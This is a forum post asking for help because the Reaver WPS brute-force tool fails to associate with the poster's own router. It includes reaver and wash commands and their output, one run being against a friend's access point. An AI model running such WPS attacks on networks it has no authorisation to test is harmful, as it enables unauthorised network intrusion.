Results 1 to 10 of 19

Thread: Help with Reaver

Threaded View

  1. #1
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default Help with Reaver

    Hi

    I'm trying to crack my WPS on my Draytek V2110n. I run BT5R2 on my laptop.

    When I run Reaver it fails to associate:

    Code:
    root@bt:~# reaver -i mon0 -b 00:50:7F:AD:28:XX -c 1 -vv
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Switching mon0 to channel 1
    [+] Waiting for beacon from 00:50:7F:AD:28:XX
    [!] WARNING: Failed to associate with 00:50:7F:AD:28:XX (ESSID: HairyThePig)
    [!] WARNING: Failed to associate with 00:50:7F:AD:28:XX (ESSID: HairyThePig)
    [!] WARNING: Failed to associate with 00:50:7F:AD:28:XX (ESSID: HairyThePig)
    [!] WARNING: Failed to associate with 00:50:7F:AD:28:XX (ESSID: HairyThePig)
    ^C
    [+] Nothing done, nothing to save.
    I tried pressing the WPS button on my router but it didnt make any difference.

    I tried my a friend's AP breifly, and it started to work, then started failing - possibly a failsafe/WPS hack protection?

    Code:
    root@bt:~# reaver -i mon0 -b C4:3D:C7:43:74:XX -c 11 -vv
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Switching mon0 to channel 11
    [?] Restore previous session for C4:3D:C7:43:74:XX? [n/Y] Y     
    [+] Restored previous session
    [+] Waiting for beacon from C4:3D:C7:43:74:XX
    [+] Associated with C4:3D:C7:43:74:XX (ESSID: Shabba)
    [+] Trying pin 11115670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response                                                           
    [+] Received identity request                                                           
    [+] Sending identity response                                                           
    [+] Received M1 message                                                                 
    [+] Sending M2 message                                                                  
    [+] Received M1 message                                                                 
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    Any tips?

    EDIT:

    Bit more info.

    Repeated attempts show that sometimes it does associate, but it immediately disassociates again.

    Also:

    Code:
    root@bt:~# wash -i mon0
    
    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
    ---------------------------------------------------------------------------------------------------------------
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    Unless I do -C:

    Code:
    root@bt:~# wash -i mon0 -C
    
    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
    ---------------------------------------------------------------------------------------------------------------
    00:50:7F:AD:28:XX       1            -38        1.0               No                HairyThePig
    Still stumped!
    Last edited by hongman; 04-20-2012 at 04:25 PM.

Similar Threads

  1. Wash not installing with Reaver via Apt-Get
    By joshv06 in forum BackTrack 5 Bugs
    Replies: 1
    Last Post: 03-12-2013, 04:33 PM
  2. Reaver 1.2 WPS Brute Forcer Video and Information
    By MartinBishop in forum BackTrack 5 Videos
    Replies: 3
    Last Post: 03-07-2012, 08:46 AM
  3. Inflator: Reaver Command generator 1.0 release
    By prince_vegeta in forum BackTrack 5 General Topics
    Replies: 1
    Last Post: 01-27-2012, 07:33 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •